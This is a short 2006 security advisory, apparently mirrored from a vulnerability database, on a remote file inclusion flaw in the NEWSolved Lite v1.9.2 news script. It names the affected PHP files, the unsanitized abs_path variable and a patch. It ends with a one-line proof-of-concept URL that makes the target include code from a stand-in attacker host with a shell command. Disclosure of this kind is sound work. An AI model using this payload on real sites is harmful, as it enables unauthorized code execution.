Lucene search
SecurityvulnsSECURITYVULNS:DOC:13781HistoryAug 08, 2006 - 12:00 a.m.
NEWSolved Lite v1.9.2 (abs_path) Remote File Inclusion
2006-08-0800:00:00
vulners.com
7
±-------------------------------------------------------------------
+
- NEWSolved Lite v1.9.2 (abs_path) Remote File Inclusion
±-------------------------------------------------------------------
+
- Affected Software .: NEWSolved Lite v1.9.2 (maybe above)
- Venedor …: http://www.usolved.net
- Class …: Remote File Inclusion
- Risk …: high (Remote File Execution)
- Found by …: Philipp Niedziela
- Original advisory .: http://www.bb-pcsecurity.de/sicherheit_286.htm
- Contact …: webmaster[at]bb-pcsecurity[.]de
-
http://www.bb-pcsecurity.de
±-------------------------------------------------------------------
+
- Affected files:
- newsscript_lyt.php
- newsticker/newsscript_get.php
- inc/output/news_theme1.php
- inc/output/news_theme2.php
- inc/output/news_theme3.php
±-------------------------------------------------------------------
+
- $abs_path is not properly sanitized before being used
±-------------------------------------------------------------------
+
- Solution:
- Download Patch v1.9.3 and replace the files above.
±-------------------------------------------------------------------
+
- PoC:
- http://[target]/inc/output/news_theme1.php?abs_path=http://evilsite.com?cmd=ls
±------------------------[ E O F ]----------------------------------